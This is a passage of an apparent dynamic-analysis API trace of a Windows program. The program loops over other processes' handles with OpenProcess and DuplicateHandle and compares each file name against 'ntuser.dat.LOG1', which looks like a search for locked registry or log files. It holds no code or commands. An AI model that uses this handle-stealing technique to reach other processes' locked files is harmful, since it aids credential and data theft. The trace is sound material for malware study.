(dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.716] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.717] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.718] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.718] CloseHandle (hObject=0x670) returned 1 [0151.718] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.718] CloseHandle (hObject=0x680) returned 1 [0151.719] CloseHandle (hObject=0x62c) returned 1 [0151.719] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.719] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.719] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.720] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.720] CloseHandle (hObject=0x670) returned 1 [0151.720] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.720] CloseHandle (hObject=0x680) returned 1 [0151.721] CloseHandle (hObject=0x62c) returned 1 [0151.721] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.721] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.721] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.722] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.722] CloseHandle (hObject=0x670) returned 1 [0151.722] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.722] CloseHandle (hObject=0x680) returned 1 [0151.723] CloseHandle (hObject=0x62c) returned 1 [0151.723] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.723] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.723] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.724] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.725] CloseHandle (hObject=0x670) returned 1 [0151.725] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.725] CloseHandle (hObject=0x680) returned 1 [0151.725] CloseHandle (hObject=0x62c) returned 1 [0151.725] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.725] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.726] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.731] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.731] CloseHandle (hObject=0x670) returned 1 [0151.731] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.731] CloseHandle (hObject=0x680) returned 1 [0151.731] CloseHandle (hObject=0x62c) returned 1 [0151.732] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.732] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.732] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.733] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.734] CloseHandle (hObject=0x670) returned 1 [0151.734] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.734] CloseHandle (hObject=0x680) returned 1 [0151.734] CloseHandle (hObject=0x62c) returned 1 [0151.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.734] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.735] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.736] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.736] CloseHandle (hObject=0x670) returned 1 [0151.736] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.736] CloseHandle (hObject=0x680) returned 1 [0151.736] CloseHandle (hObject=0x62c) returned 1 [0151.736] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.736] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.738] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.739] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.739] CloseHandle (hObject=0x670) returned 1 [0151.739] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.739] CloseHandle (hObject=0x680) returned 1 [0151.739] CloseHandle (hObject=0x62c) returned 1 [0151.739] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.739] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.740] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.741] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.742] CloseHandle (hObject=0x670) returned 1 [0151.742] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.742] CloseHandle (hObject=0x680) returned 1 [0151.742] CloseHandle (hObject=0x62c) returned 1 [0151.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.742] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.742] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.743] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.744] CloseHandle (hObject=0x670) returned 1 [0151.744] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.744] CloseHandle (hObject=0x680) returned 1 [0151.744] CloseHandle (hObject=0x62c) returned 1 [0151.744] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.744] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x620, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.745] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.746] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.746] CloseHandle (hObject=0x670) returned 1 [0151.746] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.746] CloseHandle (hObject=0x680) returned 1 [0151.746] CloseHandle (hObject=0x62c) returned 1 [0151.746] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.746] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.747] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.748] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.748] CloseHandle (hObject=0x670) returned 1 [0151.748] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.748] CloseHandle (hObject=0x680) returned 1 [0151.748] CloseHandle (hObject=0x62c) returned 1 [0151.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.748] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.749] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.751] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.751] CloseHandle (hObject=0x670) returned 1 [0151.751] CloseHandle (hObject=0x680) returned 1 [0151.751] CloseHandle (hObject=0x62c) returned 1 [0151.751] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.751] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x638, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.751] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.752] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.753] CloseHandle (hObject=0x670) returned 1 [0151.753] CloseHandle (hObject=0x680) returned 1 [0151.753] CloseHandle (hObject=0x62c) returned 1 [0151.753] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.753] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x690, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.754] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.755] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.755] CloseHandle (hObject=0x670) returned 1 [0151.755] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.755] CloseHandle (hObject=0x680) returned 1 [0151.755] CloseHandle (hObject=0x62c) returned 1 [0151.755] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.755] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.756] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.757] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.757] CloseHandle (hObject=0x670) returned 1 [0151.757] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.757] CloseHandle (hObject=0x680) returned 1 [0151.757] CloseHandle (hObject=0x62c) returned 1 [0151.757] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.758] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.758] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.759] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.760] CloseHandle (hObject=0x670) returned 1 [0151.760] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.760] CloseHandle (hObject=0x680) returned 1 [0151.760] CloseHandle (hObject=0x62c) returned 1 [0151.760] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.760] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.761] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.763] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.763] CloseHandle (hObject=0x670) returned 1 [0151.763] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.763] CloseHandle (hObject=0x680) returned 1 [0151.763] CloseHandle (hObject=0x62c) returned 1 [0151.763] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.763] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x748, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.764] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.765] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.765] CloseHandle (hObject=0x670) returned 1 [0151.765] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.765] CloseHandle (hObject=0x680) returned 1 [0151.765] CloseHandle (hObject=0x62c) returned 1 [0151.765] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.765] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x754, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.766] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.766] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.767] CloseHandle (hObject=0x670) returned 1 [0151.767] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.767] CloseHandle (hObject=0x680) returned 1 [0151.767] CloseHandle (hObject=0x62c) returned 1 [0151.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.767] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.768] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.769] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.769] CloseHandle (hObject=0x670) returned 1 [0151.769] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.769] CloseHandle (hObject=0x680) returned 1 [0151.769] CloseHandle (hObject=0x62c) returned 1 [0151.769] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.769] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.770] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.771] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.772] CloseHandle (hObject=0x670) returned 1 [0151.772] CloseHandle (hObject=0x680) returned 1 [0151.772] CloseHandle (hObject=0x62c) returned 1 [0151.772] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.772] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.772] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.773] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.773] CloseHandle (hObject=0x670) returned 1 [0151.773] CloseHandle (hObject=0x680) returned 1 [0151.773] CloseHandle (hObject=0x62c) returned 1 [0151.774] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.774] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.774] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.775] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.775] CloseHandle (hObject=0x670) returned 1 [0151.775] CloseHandle (hObject=0x680) returned 1 [0151.775] CloseHandle (hObject=0x62c) returned 1 [0151.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.775] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.776] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.777] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.777] CloseHandle (hObject=0x670) returned 1 [0151.777] CloseHandle (hObject=0x680) returned 1 [0151.777] CloseHandle (hObject=0x62c) returned 1 [0151.777] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.777] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.779] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.780] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.780] CloseHandle (hObject=0x670) returned 1 [0151.781] _wcsicmp (_Str1="\\.", _Str2="\\ntuser.dat.LOG1") returned -64 [0151.781] CloseHandle (hObject=0x680) returned 1 [0151.781] CloseHandle (hObject=0x62c) returned 1 [0151.781] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0151.781] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.781] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.783] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.783] CloseHandle (hObject=0x670) returned 1 [0151.783] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", 